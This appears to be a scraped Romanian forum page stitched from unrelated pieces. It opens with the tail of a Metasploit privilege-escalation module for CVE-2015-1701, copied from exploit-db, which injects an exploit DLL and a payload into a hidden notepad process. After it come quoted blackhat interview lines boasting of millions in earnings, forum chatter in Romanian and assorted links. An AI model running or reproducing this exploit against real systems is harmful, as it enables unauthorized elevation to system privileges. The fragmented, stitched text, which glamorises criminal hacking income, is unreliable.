fail_with(Failure::None, 'Session is already elevated') end if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') end if sysinfo['Architecture'] =~ /wow64/i fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86 fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64 fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') end print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) begin process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Metrepreter::RequestError # Reader Sandbox won't allow to create a new process: # stdapi_sys_process_execute: Operation failed: Access is denied. print_status('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") if target.arch.first == ARCH_X86 dll_file_name = 'cve-2015-1701.x86.dll' else dll_file_name = 'cve-2015-1701.x64.dll' end library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name) library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid}...") exploit_mem, offset = inject_dll_into_process(process, library_path) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status('Payload injected. Executing exploit...') process.thread.create(exploit_mem + offset, payload_mem) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end Sursa: https://www.exploit-db.com/exploits/37367/

Q: How much money do you think you made after expenses per year at your peak doing blackhat activities? A: I can’t really go into specifics but when 9/11 happened we were making millions. Q: And how much do you think you made last year? A: Off the top of my head? Around about 400-500k. Last year was kind of shit. People became wiser, patches became more frequent. This year we have 3/4 of that amount already. Cine e? Cum il cheama? A facut puscarie? Nu am zis ca e renumit, dimpotriva, nu trebuie sa fie.

Sunt 3 parti: https://blog.whitehatsec.com/interview-with-a-blackhat-part-1/

Cred ca e pentru Junior, nu stiu, are un "JD" in coada (Junior Developer?). Iti trimit PM.

http://adevarul.ro/locale/ramnicu-valcea/cum-ajuns-ramnicu-valcea-mai-periculos-oras-americani-marturia-rapperului-documentarul-inventat-despre-hackerii-romani-1_558930fc0a48ab3512000001/index.html